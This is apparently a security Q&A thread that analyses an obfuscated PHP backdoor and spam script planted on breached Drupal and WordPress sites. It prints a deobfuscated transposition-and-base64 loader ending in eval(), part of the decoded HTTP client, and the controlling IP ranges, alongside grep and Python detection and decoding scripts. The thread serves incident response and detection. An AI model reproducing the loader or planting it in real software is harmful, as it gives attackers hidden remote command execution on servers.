        if( isset($params['cookie']) )
        {
            $cookie = "";
            if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);}
            else $cookie = $params['cookie'];
            if( $cookie!='' ) $request .= "Cookie: $cookie\r\n";
        }
        $request .= "Connection: close\r\n";
        if( $params['method']=='POST' )
        {
            if( isset($params['data']) && is_array($params['data']) )
            {
                foreach($params['data'] AS $k => $v)
                    $data .= urlencode($k).'='.urlencode($v).'&';
                if( substr($data, -1)=='&' ) $data = substr($data,0,-1);
            }
            $data .= "\r\n\r\n";

            $request .= "Content-type: application/x-www-form-urlencoded\r\n";
            $request .= "Content-length: ".strlen($data)."\r\n";
        }
        $request .= "\r\n";

        if( $params['method'] == 'POST' ) $request .= $data;

        @fwrite ($fp,$request); /* Send request */

        $res = ""; $headers = ""; $h_detected = false;
        while( !@feof($fp) )
        {
            $res .= @fread($fp, 1024); /* читаем контент */

            /* Проверка наличия загловков в контенте */
            if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE )
            {
                /* заголовки уже считаны - корректируем контент */
                $h_detected = true;

                $headers = substr($res, 0, strpos($res, "\r\n\r\n"));
                $res = substr($res, strpos($res, "\r\n\r\n")+4);

                /* Headers to Array */
                if( $params['return']=='headers' || $params['return']=='array'
                    || (isset($params['redirect']) && $params['redirect']==true) )
                {
                    $h = explode("\r\n", $headers);
                    $headers = array();
                    foreach( $h as $k=>$v )
                    {
                        if( strpos($v, ':') )
                        {
                            $k = substr($v, 0, strpos($v, ':'));
                            $v = trim(substr($v, strpos($v, ':')+1));
                        }
                        $headers[strtoupper($k)] = $v;
                    }
                }
                if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) )
                {
                    $params['url'] = $headers['LOCATION'];
                    if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0;
                    if( $params['redirect-count']<10 )
                    {
                        $params['redirect-count']++;
                        $func = __FUNCTION__;
                        return @is_object($this) ? $this->$func($params) : $func($params);
                    }
                }
                if( $params['return']=='headers' ) return $headers;
            }
        }

        @fclose($fp);
    }
    else return FALSE;/* $errstr.$errno; */

    if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res);

    return $res;
}

It is interesting to see some comments in the code in Russian. Google Translate does well on them:

$res .= @fread($fp, 1024); /* читаем контент */ "read content"

/* Проверка наличия загловков в контенте */ "Check for the presence of headers in the content"

/* заголовки уже считаны - корректируем контент */ "the headers have already been read - adjust the content"

answered 15.04.2015 - 18:12
source
3

About the script

The code is clearly a malicious script written in PHP for sending spam and other illegal activities.

In fact this script is very easy to decode: change eval to echo, and running it prints the nicely formatted source code.

The reason the authors of this exploit spent so much time protecting this code with the transposition-array mapping (despite the simple decoding method) is that the code can be varied (a metamorphic method) and made unique for every infected server, which keeps it from being easily caught by standard detection methods (antivirus, grep, Google, etc.).

Method of action

One user reported that this script was sending spam massively and clogging Qmail on the server, preventing legitimate e-mail from being sent and received by the other sites on the server (nearly 10,000 e-mails in the queue) source.

And the most offending IP addresses were:

62.76.191.119
146.185.239.51 (Russia)
37.203.208.9

The sample spam e-mail looks like:

To: <[email protected]>
Subject: 55th Anniversary and Free Pizza
X-PHP-Originating-Script: 763659:template46.php(236) : eval()'d code
From: Pizza Hut <[email protected]>
X-Mailer: mPOPWeb-Mail2.19
Reply-To: Pizza Hut <[email protected]>
Content-Type: multipart/alternative;
boundary="----------1414414378544E402ACEEBC"
Message-ID: <[email protected]>
Date: Mon, 27 Oct 2014 12:52:58 +0000

Free personal Pan Pizza
Today we are celebrating our 55th anniversary and we want you to share this celebration with us - you may get a free pizza in any of our restaurants.
Get Free Pizza Coupon
The offer is valid through November 5th, 2014.
Copyright (c) 2014 | All right reserved | Pizza Hut

Its method of action is also explained by tremor on stackoverflow.

Identification and searching

There seem to be many variants (such as here, here), and looking through the most frequent reports on the internet, the most common victims are Drupal CMS and WordPress instances.

Here is the variation of these scripts on Drupal:

sites/all/modules/contrib/ctools/stylizer/plugins/export_ui/template46.php
sites/all/libraries/ckeditor/plugins/specialchar/dialogs/.files74.php
modules/image/tests/stats.php
sites/all/libraries/ckeditor/skins/office2003/images/ajax48.php
sites/all/themes/austin/templates/.javascript.php
sites/all/libraries/ckeditor/plugins/scayt/dialogs/list.php
sites/all/libraries/ckeditor/plugins/scayt/dialogs/.login25.php
sites/default/files/styles/gallerformatter_thumb/public/.sql74.php
sites/all/modules/colorbox/styles/stockholmsyndrome/images/.cache61.php
modules/field/modules/text/.file.php
css/object16.php
sites/all/modules/i18n/i18n_block/stats7.php

and WordPress:

wp-content/backup-2365b/.title14.php
wp-content/uploads/wysija/themes/rss.lib.php
wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/fontawesome/admin38.php

Considering the pattern of these files, it appears they were uploaded automatically by another script, and the file name is built from the most common IT words followed by a random number, a php extension and an optional leading dot (which hides the file).

How to find these files?

I used grep as follows:

grep -R return.*base64_decode  .

or

grep --include=\*.php -rn 'return.*base64_decode($v.\{6\})' .

If there is no shell access, transferring over FTP (ncftpget -R) and checking locally could help.

What is affected and how they got in

Drupal is the most affected, because of the recent SQL injection vulnerability (SA-CORE-2014-005) that allows an attacker to send specially crafted requests resulting in arbitrary SQL execution, which would create a new file inside the Drupal folder hierarchy to be used later in attempts to hack the system. It was rated 25 out of 25 as a highly critical bug, and all Drupal 7.x core versions prior to 7.32 were affected. That is why it was called Drupageddon. More information at: FAQ on SA-CORE-2014-005

Wikipedia states:

On October 15, 2014, a sql injection vulnerability was announced and update released. Two weeks later the Drupal security team released an advisory explaining that everyone should act under the assumption that any site not updated within 7 hours of the announcement are infected. Thus, it can be extremely important to apply these updates quickly and usage of a tool to make this process easier like drush is highly recommended.

More information

answered 15.04.2015 - 22:01
source
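The grep lines above catch the decoder's return statement; the following added Python triage script (mine, not from the answer) combines that content signature with the long one-line transposition map and the hidden numbered-name pattern seen in the Drupal and WordPress lists, and runs over a constructed fixture tree. The file contents and paths in FIXTURE_FILES are made up to mirror the shapes described, not real samples.

```python
import os
import re
import tempfile

# Signatures taken from the answer above: the decoder tail "return base64_decode($v......)"
# ($v plus six alphanumerics, as in the grep command), a long one-line 'x'=>'y'
# transposition map, and a dot-prefixed PHP name (.files74.php, .login25.php, ...).
DECODER_TAIL = re.compile(r"return\s+base64_decode\(\$v[A-Za-z0-9]{6}\)")
MAP_RUN = re.compile(r"('[A-Za-z0-9]'=>'[A-Za-z0-9]',\s*){10,}")  # real map: 62 pairs
HIDDEN_NAME = re.compile(r"^\.[A-Za-z]+\d*\.php$")

def classify_php(name, source):
    """Return the signature names one PHP file triggers (empty list = clean)."""
    hits = []
    if DECODER_TAIL.search(source):
        hits.append("decoder-tail")
    if MAP_RUN.search(source):
        hits.append("transposition-map")
    if HIDDEN_NAME.match(name):
        hits.append("hidden-name")
    return hits

def scan_php_tree(root):
    """Walk root; map each suspect path (relative to root) to its signatures."""
    suspects = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                hits = classify_php(name, fh.read())
            if hits:
                suspects[os.path.relpath(path, root)] = hits
    return suspects

# Constructed fixture (not real samples) mirroring the Drupal paths listed above.
DECODER = "function vD4E5F6($vX, $vY){$vZ9Q8W1 = ''; return base64_decode($vZ9Q8W1);}\n"
MAP = "Array(" + ", ".join(f"'{k}'=>'{v}'" for k, v in zip("1032547698AC", "kQzeR7mBxLt9")) + ")"
FIXTURE_FILES = {
    "sites/all/libraries/ckeditor/plugins/scayt/dialogs/.login25.php":
        "<?php\n$vA1B2C3 = " + MAP + ";\n" + DECODER,
    "sites/all/modules/i18n/i18n_block/stats7.php": "<?php\n" + DECODER,  # not hidden
    "modules/clean/index.php": "<?php function unwrap($t){ return base64_decode($t); }\n",
}

def build_fixture():
    """Write FIXTURE_FILES under a fresh temp dir and return its root."""
    root = tempfile.mkdtemp()
    for rel, body in FIXTURE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root
```

Run scan_php_tree(build_fixture()) to see both planted files flagged while the benign base64_decode call in index.php is left alone; a real webroot can be passed in place of the fixture.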
1

This is a remote command shell for a server that has probably been breached, and you should consider the server compromised. It would be wise to suspend everything it hosts, audit all the code on the machine and rebuild/replace it.

The remote users who presumably control this script can make it run any command by posting a "CODE" that is base64_-encoded (which gets the "code" eval'd).

The script is locked to a range of IP addresses. The controlling IP addresses appear to be 6.185.239.* and 8.138.118.* ... which are bizarrely owned by the US Department of Defense (US Army Information Systems Command) and Level3, a backbone provider (I only checked a handful of IP addresses in these two ranges, but so far it is pretty damning.) This is the logic that checks it, is_good_ip().

So:

  1. this is something sent and controlled by the Army at Fort Huachuca, AZ
  2. their servers are compromised and are being used to launder this command chain
  3. neither: someone is falsely implicating or accusing the DOD by listing their IP addresses in a shell, and is instead using the Level3 machines to communicate.

In any case, in your long original snippet, if you take the last eval(...) bit and replace it with echo htmlentities(...), you can see the full code listing. In many places it looks like it is about e-mail, and probably spidering content for e-mail content generation.

Source: posted by pp19dd at Can anyone decode this?

answered 15.04.2015 - 21:48
source
0

This file employs similar tactics to obfuscate the payload. With the variable names and indentation changed, its actions become very clear:

<?php
$char_transposition_map = Array('1'=>'N', '0'=>'S', '3'=>'O', '2'=>'8', '5'=>'v', '4'=>'3', '7'=>'H', '6'=>'n', '9'=>'W', '8'=>'u', 'A'=>'C', 'C'=>'f', 'B'=>'9', 'E'=>'q', 'D'=>'g', 'G'=>'y', 'F'=>'Y', 'I'=>'0', 'H'=>'t', 'K'=>'F', 'J'=>'w', 'M'=>'Q', 'L'=>'b', 'O'=>'2', 'N'=>'d', 'Q'=>'k', 'P'=>'6', 'S'=>'T', 'R'=>'V', 'U'=>'p', 'T'=>'R', 'W'=>'x', 'V'=>'4', 'Y'=>'s', 'X'=>'5', 'Z'=>'X', 'a'=>'A', 'c'=>'G', 'b'=>'e', 'e'=>'j', 'd'=>'1', 'g'=>'L', 'f'=>'U', 'i'=>'B', 'h'=>'r', 'k'=>'c', 'j'=>'a', 'm'=>'P', 'l'=>'7', 'o'=>'h', 'n'=>'D', 'q'=>'m', 'p'=>'I', 's'=>'o', 'r'=>'Z', 'u'=>'i', 't'=>'M', 'w'=>'J', 'v'=>'l', 'y'=>'E', 'x'=>'z', 'z'=>'K');

function transpose_and_base64_decode($source_text, $transposition_map) {
  $transposed_string = '';
  for($i=0; $i < strlen($source_text); $i++) {
    $transposed_string .= isset($transposition_map[$source_text[$i]]) ? $transposition_map[$source_text[$i]] : $source_text[$i];
  }
  return base64_decode($transposed_string);
}

$long_text = '<SNIP>';

eval(transpose_and_base64_decode($long_text, $char_transposition_map));
?>

Source: Debianizing PHP malware

answered 15.04.2015 - 21:30
source
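The second answer decodes by swapping eval for echo, and the answer just above shows the same decoder with readable names; as an added example (not from any of the answers), here is a Python decoder that does the same job statically, without ever running the sample: it pulls the Array(...) map and the concatenated blob out of the file text, applies the character substitution and base64 step, and repeats in case a decoded stage carries its own map. SAMPLE_PHP is a constructed ten-entry stand-in for the real 62-entry map, and all names in it are invented.

```python
import base64
import re

# Constructed sample in the shape of template46.php (not the page's own blob):
# a 10-entry transposition map (the real one maps all 62 alphanumerics), the
# decoder function, and the payload split across concatenated literals.
SAMPLE_PHP = r"""<?php
$vA1B2C3 = Array('b'=>'Z', 'Z'=>'b', '3'=>'W', 'W'=>'3', '7'=>'N', 'N'=>'7', 'o'=>'S', 'S'=>'o', 'y'=>'c', 'c'=>'y');
function vD4E5F6($vX, $vY){$vZ = ''; for($i=0; $i < strlen($vX); $i++){$vZ .= isset($vY[$vX[$i]]) ? $vY[$vX[$i]] : $vX[$i];}
return base64_decode($vZ);}
$vG7H8I9 = 'b37SZcAi'.
'yWBhZoIN';
eval(vD4E5F6($vG7H8I9, $vA1B2C3));
?>"""

MAP_ENTRY = re.compile(r"'(.)'\s*=>\s*'(.)'")
# A variable assigned one or more single-quoted literals glued together with '.'
BLOB = re.compile(r"\$\w+\s*=\s*((?:'[^']*'\s*\.?\s*)+);")

def extract_map(php):
    """Key/value pairs of the Array(...) literal: the malware's lookup table."""
    return dict(MAP_ENTRY.findall(php))

def extract_blob(php):
    """Longest concatenated string literal in the file: the obfuscated payload."""
    best = ""
    for m in BLOB.finditer(php):
        joined = "".join(re.findall(r"'([^']*)'", m.group(1)))
        if len(joined) > len(best):
            best = joined
    return best

def unmap(blob, table):
    """Same rule as the PHP decoder: mapped characters swap, others pass through."""
    return "".join(table.get(ch, ch) for ch in blob)

def decode_once(php):
    """Statically undo one map+base64 layer; None if the text carries no layer."""
    table, blob = extract_map(php), extract_blob(php)
    if not table or not blob:
        return None
    b64 = unmap(blob, table)
    return base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("latin-1")

def decode_layers(php, max_depth=5):
    """Peel nested layers (a decoded stage may carry its own map) without eval."""
    layers, current = [], php
    for _ in range(max_depth):
        decoded = decode_once(current)
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    return layers
```

Feed the real file's text to decode_layers() and write each returned layer to a .txt file for reading; nothing here executes the decoded PHP.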
